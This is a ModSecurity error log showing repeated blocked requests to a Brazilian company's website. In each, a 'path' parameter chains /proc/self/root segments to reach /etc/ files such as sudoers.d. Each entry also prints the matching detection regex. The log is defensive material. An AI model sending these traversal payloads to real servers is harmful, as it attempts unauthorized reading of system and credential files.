[Mon Mar 16 14:30:22.996703 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:51200] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-Lv9ocpUE4ed4uDz4-gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:24.064825 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:49282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-MLABkC4fWIHEf8H4uQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:24.287410 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:51216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-MI6lpbStxTqkSkt1mwAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:25.456060 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.243.203:41040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-MaTCbgAP5jq5Teg0vQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:25.499335 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:51218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-MaQpVkWug9HeOt8_UwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:26.662003 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:51230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-MrysWC90G-1nBrBNpwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:27.880732 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:51240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-M1ajLEzk2WiQ-10byAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:32.397254 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:60270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-OKQpVkWug9HeOt8_VwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:37.529218 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.243.203:41042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-PVajLEzk2WiQ-10b0gAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:40.990895 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.243.203:45946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-QKTCbgAP5jq5Teg0zAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:47.295900 2026] [:error] [pid 15568:tid 140411624429312] [client 74.7.243.203:40614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-RqQpVkWug9HeOt8_XwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:48.580261 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:40620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-SKTCbgAP5jq5Teg01QAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:51.883710 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:40626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-S9SswJuvopo3lOhokgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:55.543163 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:34814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-TtSswJuvopo3lOholQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:31:27.896778 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:60280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-b6TCbgAP5jq5Teg1BQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:38.126261 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:44192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-eqTCbgAP5jq5Teg1DgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:39.466638 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:48708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-e3jZBu2q05ozVU9jDgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:42.430488 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:48710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-fXjZBu2q05ozVU9jFAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:43.740020 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:48718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-f1ajLEzk2WiQ-10b3wAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:45.966829 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:48728] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-gdSswJuvopo3lOhomwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:31:47.322383 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:48734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-g7ABkC4fWIHEf8H4vwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
